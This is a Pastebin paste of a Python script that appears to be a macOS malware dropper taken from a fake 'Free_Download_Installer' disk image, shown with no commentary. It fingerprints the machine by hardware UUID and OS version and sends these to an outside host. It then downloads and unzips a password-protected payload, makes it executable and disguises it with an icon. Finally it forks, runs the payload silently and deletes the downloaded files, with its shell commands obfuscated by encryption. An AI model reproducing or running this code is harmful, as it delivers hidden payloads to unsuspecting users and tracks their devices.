Advertisement
opexxx

fcc0084d67dedebb13af7847d4d8d29d527483ccf85487128f42d878aa16

Sep 25th, 2018
407
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.38 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. import uuid
  4. import subprocess
  5. import os
  6. import sys
  7. import platform
  8. import shutil
  9. import imp
  10. edt = imp.load_source('edt', '/Volumes/Free_Download_Installer/Free_Download_Installer.app/Contents/MacOS/hx8yjmk')
  11. import objc
  12. import urllib
  13.  
  14.  
  15. from Foundation import NSBundle
  16.  
  17. IOKit_bundle = NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
  18.  
  19. functions = [("IOServiceGetMatchingService", b"II@"),
  20.              ("IOServiceMatching", b"@*"),
  21.              ("IORegistryEntryCreateCFProperty", b"@I@@I"),
  22.             ]
  23.  
  24. objc.loadBundleFunctions(IOKit_bundle, globals(), functions)
  25. def io_key(keyname):
  26.     return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0, IOServiceMatching("IOPlatformExpertDevice")), keyname, None, 0)
  27.  
  28. def getHardwardUuid():
  29.     return io_key("IOPlatformUUID")
  30.  
  31. def downloadFile(fileUrl, destination, key):   
  32.     commands = ["curl", "-f0L", "-o"]
  33.     encryptedCommands = edt.encryptList(commands, key) 
  34.     encryptedCommands.extend([destination, fileUrl])
  35.     quietShellCommand( encryptedCommands, key)
  36.  
  37. def unzip(zippedFile, password, key):      
  38.     tempDir = edt.encryptText('/tmp', key)
  39.     tempInstallerDir = edt.decryptText(tempDir + zippedFile, key)
  40.     if os.path.exists(tempInstallerDir):
  41.         shutil.rmtree(tempInstallerDir)
  42.     os.makedirs(tempInstallerDir)
  43.     commands = ['unzip', '-P'] 
  44.     encryptedCommands = edt.encryptList(commands, key) 
  45.     encryptedCommands.extend([password, zippedFile])
  46.     endCommands = [ edt.encryptText('-d', key), edt.encryptText(tempInstallerDir, key)]
  47.     encryptedCommands.extend(endCommands)
  48.  
  49.     quietShellCommand(encryptedCommands, key)
  50.     return edt.encryptText(tempInstallerDir + "/", key)
  51.  
  52. def findVolumePath(appName):
  53.     dirs = os.listdir('/Volumes')
  54.     for vol in dirs:
  55.         testPath = "/Volumes/" + vol
  56.         if os.access(testPath + "/" + appName, os.F_OK):
  57.             return testPath
  58.     return ""
  59.  
  60. def moveIcon(destination, key):
  61.     appName = "Free_Download_Installer.app"
  62.     volumPath = findVolumePath(appName)
  63.     iconDir = volumPath + "/" + appName + "/Contents/Resources/"
  64.     dirs = os.listdir(iconDir)
  65.     sourceIcon = ""
  66.     for file in dirs:
  67.         if file.endswith(".icns"):
  68.             sourceIcon = file
  69.     iconPath = edt.encryptText(iconDir + sourceIcon, key)
  70.     quietShellCommand([edt.encryptText('cp', key), iconPath, destination], key)
  71.  
  72. def quietShellCommand(commands, key):
  73.     devNull = open("/dev/null","r")
  74.     devNullID = devNull.fileno()
  75.     decryptedCommands = edt.decryptList(commands, key) 
  76.     subprocess.check_call(decryptedCommands, stdout=devNullID, stderr=devNullID)
  77.  
  78. def getAppName(directory, key):
  79.     dirs = os.listdir(edt.decryptText(directory, key))
  80.     for file in dirs:
  81.         if file.endswith(".app"):
  82.             return file
  83.  
  84.  
  85. key = edt.getKey()
  86. uuid = str(uuid.uuid4())
  87. sessionID = edt.encryptText(uuid, key)
  88. downloadDir = edt.encryptText('/tmp/', key) + sessionID
  89. machineID = str(getHardwardUuid())
  90. osVersion,_,_ = platform.mac_ver()
  91. url = "http://api.operativeupgrade.com/dst/?ac=1f28e6bb-8c19-4890-a65b-4d0c7eef21f4&u=%(machineID)s&s=%(uuid)s&o=%(osVersion)s&b=4714511831" % locals()
  92. fileUrl = edt.encryptText(url, key)
  93. password = edt.encryptText('138115417413c69fdf-3527-437f-ad17-dd701f5229cc4714511831', key)
  94.  
  95. downloadFile(fileUrl, downloadDir, key)
  96.  
  97. unzippedFileDir = unzip(downloadDir, password, key)
  98. appName = edt.encryptText(getAppName(unzippedFileDir, key), key)
  99.  
  100. applicationPath = unzippedFileDir + appName
  101. decryptedAppPath = edt.decryptText(applicationPath, key)
  102. fullAppDir = decryptedAppPath + "/Contents/MacOS/"
  103. installerAppName = os.listdir(fullAppDir)[0]
  104. installerAppPath = edt.encryptText(fullAppDir + installerAppName, key)
  105. commands = edt.encryptList(['chmod', '+x'], key)
  106. commands.append(installerAppPath)
  107. quietShellCommand(commands, key)
  108.  
  109. decryptedAppName = edt.decryptText(appName, key)
  110. destinationIconPath = unzippedFileDir + edt.encryptText(decryptedAppName + "/Contents/Resources/app.icns", key)
  111. moveIcon(destinationIconPath, key)
  112.  
  113. if os.fork():
  114.     sys.exit()
  115. volumPath = findVolumePath("Free_Download_Installer.app")
  116. commands = edt.encryptList(['open', '-W'],key)
  117. commands.append(applicationPath)
  118. commands.extend(edt.encryptList(['--args', '-ac' + '1f28e6bb-8c19-4890-a65b-4d0c7eef21f4', 's'], key))
  119. commands.append(sessionID)
  120. commands.append(edt.encryptText(urllib.quote(volumPath), key))
  121. quietShellCommand( commands, key)
  122.  
  123. os.remove(edt.decryptText(downloadDir, key))
  124. shutil.rmtree(edt.decryptText(unzippedFileDir, key))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement